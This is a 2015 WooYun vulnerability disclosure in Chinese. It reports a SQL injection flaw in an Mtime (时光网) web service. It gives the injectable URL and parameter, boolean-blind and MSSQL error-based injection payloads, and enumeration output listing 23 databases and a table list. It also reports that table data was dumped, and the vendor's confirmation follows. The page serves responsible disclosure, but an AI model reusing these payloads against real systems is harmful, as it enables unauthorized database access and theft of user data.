当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137434

漏洞标题:时光网某站存在SQL注入漏洞(可脱库获取多个数据库内容)

相关厂商:时光网

漏洞作者: 路人甲

提交时间:2015-08-27 18:00

修复时间:2015-10-11 18:16

公开时间:2015-10-11 18:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-27: 细节已通知厂商并且等待厂商处理中
2015-08-27: 厂商已经确认,细节仅向厂商公开
2015-09-06: 细节向核心白帽子及相关领域专家公开
2015-09-16: 细节向普通白帽子公开
2015-09-26: 细节向实习白帽子公开
2015-10-11: 细节向公众公开

简要描述:

test

详细说明:

时光网http://service.mtime.com/存在sql注入漏洞,可脱库获取到很多个数据库的信息。

漏洞证明:

注入地址:http://service.mtime.com/Service/Movie.msi?Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.MovieService&Ajax_CallBackMethod=GetRatingsByMovieIds&Ajax_CrossDomain=1&Ajax_RequestUrl=http%3A%2F%2Fnews.mtime.com%2F2013%2F12%2F14%2F1521722.html&t=20158271514642113&Ajax_CallBackArgument0=135791-0

Parameter: Ajax_CallBackArgument0 (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.MovieService&Ajax_CallBackMethod=GetRatingsByMovieIds&Ajax_CrossDomain=1&Ajax_RequestUrl=http://news.mtime.com/2013/12/14/1521722.html&t=20158271514642113&Ajax_CallBackArgument0=135791-0) AND 4897=4897 AND (6132=6132
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.MovieService&Ajax_CallBackMethod=GetRatingsByMovieIds&Ajax_CrossDomain=1&Ajax_RequestUrl=http://news.mtime.com/2013/12/14/1521722.html&t=20158271514642113&Ajax_CallBackArgument0=135791-0) AND 9436=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (9436=9436) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(107)+CHAR(113))) AND (7640=7640


通过注入可获取到数据库信息

1.jpg


available databases [23]:
[*] distribution
[*] master
[*] model
[*] msdb
[*] MtimeAward
[*] mtimedailycount
[*] MtimeDVD
[*] MtimeEvents
[*] MtimeFeed
[*] MtimeFlamingoCenter
[*] MtimeGroupBuy
[*] MtimeJinYi
[*] MtimeMerchant
[*] MtimeNTC
[*] MtimeSchedule
[*] MtimeSub2
[*] MtimeTicket
[*] MtimeTicketNew
[*] MtimeTweet
[*] MtimeZYXM
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


当前库是MtimeSchedule,跑了一下当前库的表

2.jpg


+-------------------------------------+
| AndroidRegisterAPN                  |
| AndroidRemindMovieOfPush            |
| BaiduMovieCache                     |
| BroadcastUnSubscriptionWithDevice   |
| CacheContent                        |
| Comment                             |
| ExternalRecommendItem               |
| ExternalRecommendItemMatchMovie     |
| ExternalRecommendItemMatchMoviebak  |
| ExternalRecommendItemVideo          |
| ExternalRecommendItemVideobak       |
| ExternalRecommendItembak            |
| ExternalRecommendVideo              |
| ExternalRecommendVideoGroup         |
| ExternalRecommendVideoGroupVideo    |
| ExternalRecommendVideoGroupVideobak |
| ExternalRecommendVideoGroupbak      |
| ExternalRecommendVideoMatchMovie    |
| ExternalRecommendVideobak           |
| ExternalVideo                       |
| IgnoreKeyword                       |
| KeywordBase                         |
| KeywordMatch                        |
| KeywordMatchObject                  |
| M08_MovieAttitudeStatistic          |
| M08_MovieRatingStatistic            |
| M08_PersonRatingStatistic           |
| MovieAttitude                       |
| MovieBarHTML                        |
| MovieCache                          |
| MovieCommentHeatScore               |
| MovieConnection                     |
| MovieConnectionType                 |
| MovieEditorRating                   |
| MovieExternalVideo                  |
| MovieHotRanking                     |
| MovieIntegrate                      |
| MovieIntegrateInc                   |
| MoviePerson                         |
| MovieRating                         |
| MovieRatingLog                      |
| MovieRatingStatistic                |
| MovieRatingStatistics               |
| MovieRatingSummary                  |
| MovieRecommendation                 |
| MovieRelatedMovie                   |
| MovieReleaseInfo                    |
| MovieScorePower                     |
| MovieSearchKeywords                 |
| MovieVideoSearchConfig              |
| MovieYearRecommend                  |
| MoviegoingLog                       |
| MoviegoingLogStat                   |
| PageContentCache08                  |
| PersonArchivesRelation              |
| PersonCache                         |
| PersonFilmography                   |
| PersonIntegrate                     |
| PersonIntegrateInc                  |
| PersonIntegrate_bak                 |
| PersonRating                        |
| PersonRatingStatistics              |
| PersonRatingSummary                 |
| PersonScorePower                    |
| Promotion                           |
| RatingParameter                     |
| RemindMovieOfPush                   |
| TVSectionExternalVideo              |
| TVSeries                            |
| TVSeriesParagraphSeason             |
| TVSeriesParagraphSection            |
| TVSeriesParagraphVersion            |
| TVSeriesParagraphs                  |
| TVSeriesSeason                      |
| TweetShield                         |
| UserAttentionMovie                  |
| UserFindFriendsConfig               |
| UserMovieRemind                     |
| UserMovieRemindDetail               |
| UserMovieTagCount                   |
| UserRelatedUserByEMailAddress       |
| WPRegisterPushNotifications         |
| WPRemindMovieOfPush                 |
| movieattitude4movie210259           |
| movieattitudeip4movie210259         |
| movieratingbak                      |
| movieratingpassuser                 |
| mymovie                             |
+-------------------------------------+


随便跑了一个表的内容

4.jpg


有跑了一下其它几个库
MtimeAward库
表信息

5.jpg


跑一下表内数据

6.jpg


MtimeNTC库

3.jpg


其他的那些库应该也可以跑出数据,就不一一尝试了。。

修复方案:

做好过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-27 18:14

厂商回复:

我们会尽快修改,多谢

最新状态:

暂无